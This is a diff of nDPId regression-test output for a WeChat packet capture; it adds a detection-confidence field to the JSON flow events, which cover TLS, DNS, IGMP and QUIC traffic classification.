 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1088,"source":"wechat.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1492167697384,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":54,"pkt_l4_len":16,"ts_msec":1492167697384,"pkt":"AQBeAAAWeJKcD6iOCABGwAAoAABAAAECQerAqAFn4AAAFpQEAAAiAPsCAAAAAQIAAADgAAD7"}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1127,"source":"wechat.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167720101,"flow_last_seen":1492167720101,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1492167720101,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54119,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1127,"source":"wechat.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1492167720101,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167720101,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8R8JAAEAGzXrAqAFny82XotNnAbsR+WetAAAAAKACchBBBgAAAgQFtAQCCAoAMiBvAAAAAAEDAwc="}
@@ -335,88 +335,88 @@
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1128,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1492167720353,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167720353,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8TqBAAEAGxpzAqAFny82XotNoAbuP9m4OAAAAAKACchC8ZwAAAgQFtAQCCAoAMiCuAAAAAAEDAwc="}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1131,"source":"wechat.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1492167720458,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167720458,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG702cUBmdaEflnrqASN8gU+wAAAgQFoAQCCApFrqVHADIgbwEDAwc="}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1132,"source":"wechat.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":3,"flow_last_seen":1492167720458,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1492167720458,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0R8NAAEAGzYHAqAFny82XotNnAbsR+WeuFAZnW4AQAOV6PQAAAQEICgAyIMhFrqVH"}
-00811{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1133,"source":"wechat.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167720101,"flow_last_seen":1492167720458,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1492167720458,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54119,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00837{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1133,"source":"wechat.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167720101,"flow_last_seen":1492167720458,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1492167720458,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54119,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1135,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1492167720700,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167720700,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG702hvZooej\/ZuD6ASN8iscAAAAgQFoAQCCApF0wrqADIgrgEDAwc="}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1136,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1492167720700,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1492167720700,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0TqFAAEAGxqPAqAFny82XotNoAbuP9m4Pb2aKH4AQAOURtQAAAQEICgAyIQVF0wrq"}
-00868{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1138,"source":"wechat.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167720101,"flow_last_seen":1492167720812,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":1492167720812,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54119,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
-01402{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1140,"source":"wechat.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167720101,"flow_last_seen":1492167720812,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"ts_msec":1492167720812,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54119,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}}
-00811{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1159,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167720353,"flow_last_seen":1492167722010,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1492167722010,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54120,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00868{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1166,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167720353,"flow_last_seen":1492167722364,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":208,"midstream":0,"ts_msec":1492167722364,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54120,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
-01403{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1168,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167720353,"flow_last_seen":1492167722365,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":335,"midstream":0,"ts_msec":1492167722365,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54120,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}}
-00602{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1196,"source":"wechat.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167617247,"flow_last_seen":1492167617598,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492167739709,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54109,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
+00894{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1138,"source":"wechat.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167720101,"flow_last_seen":1492167720812,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":1492167720812,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54119,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+01428{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1140,"source":"wechat.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167720101,"flow_last_seen":1492167720812,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"ts_msec":1492167720812,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54119,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}}
+00837{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1159,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167720353,"flow_last_seen":1492167722010,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1492167722010,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54120,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00894{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1166,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167720353,"flow_last_seen":1492167722364,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":208,"midstream":0,"ts_msec":1492167722364,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54120,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+01429{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1168,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167720353,"flow_last_seen":1492167722365,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":335,"midstream":0,"ts_msec":1492167722365,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54120,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}}
+00636{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1196,"source":"wechat.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167617247,"flow_last_seen":1492167617598,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492167739709,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54109,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1196,"source":"wechat.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167617247,"flow_last_seen":1492167617598,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492167739709,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54109,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00602{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1196,"source":"wechat.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167617247,"flow_last_seen":1492167617562,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492167739709,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54110,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
+00636{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1196,"source":"wechat.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167617247,"flow_last_seen":1492167617562,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492167739709,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54110,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1196,"source":"wechat.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167617247,"flow_last_seen":1492167617562,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492167739709,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54110,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1196,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1492167641988,"flow_last_seen":1492167713329,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":480,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492167739709,"l3_proto":"ip6","src_ip":"fe80::7a92:9cff:fe0f:a88e","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00578{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1196,"source":"wechat.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1492167641988,"flow_last_seen":1492167713329,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":480,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492167739709,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00643{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1196,"source":"wechat.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167648243,"flow_last_seen":1492167648277,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":495,"flow_tot_l4_payload_len":526,"flow_avg_l4_payload_len":263,"midstream":0,"ts_msec":1492167739709,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":19041,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.QQ","breed":"Fun","category":"Chat"}}
-00609{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1216,"source":"wechat.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167440370,"flow_last_seen":1492167690433,"flow_idle_time":600000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1492167757556,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"IGMP","breed":"Acceptable","category":"Network"}}
-00611{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1216,"source":"wechat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1492167440984,"flow_last_seen":1492167695144,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1492167757556,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"IGMP","breed":"Acceptable","category":"Network"}}
-00610{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1216,"source":"wechat.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167449288,"flow_last_seen":1492167697384,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1492167757556,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"IGMP","breed":"Acceptable","category":"Network"}}
-00653{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1216,"source":"wechat.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167650311,"flow_last_seen":1492167650345,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1492167757556,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60562,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"}}
-00658{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1216,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1492167650348,"flow_last_seen":1492167650467,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":3552,"flow_avg_l4_payload_len":355,"midstream":0,"ts_msec":1492167757556,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.67","src_port":35601,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}}
+00669{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1196,"source":"wechat.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167648243,"flow_last_seen":1492167648277,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":495,"flow_tot_l4_payload_len":526,"flow_avg_l4_payload_len":263,"midstream":0,"ts_msec":1492167739709,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":19041,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.QQ","breed":"Fun","category":"Chat"}}
+00635{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1216,"source":"wechat.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167440370,"flow_last_seen":1492167690433,"flow_idle_time":600000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1492167757556,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
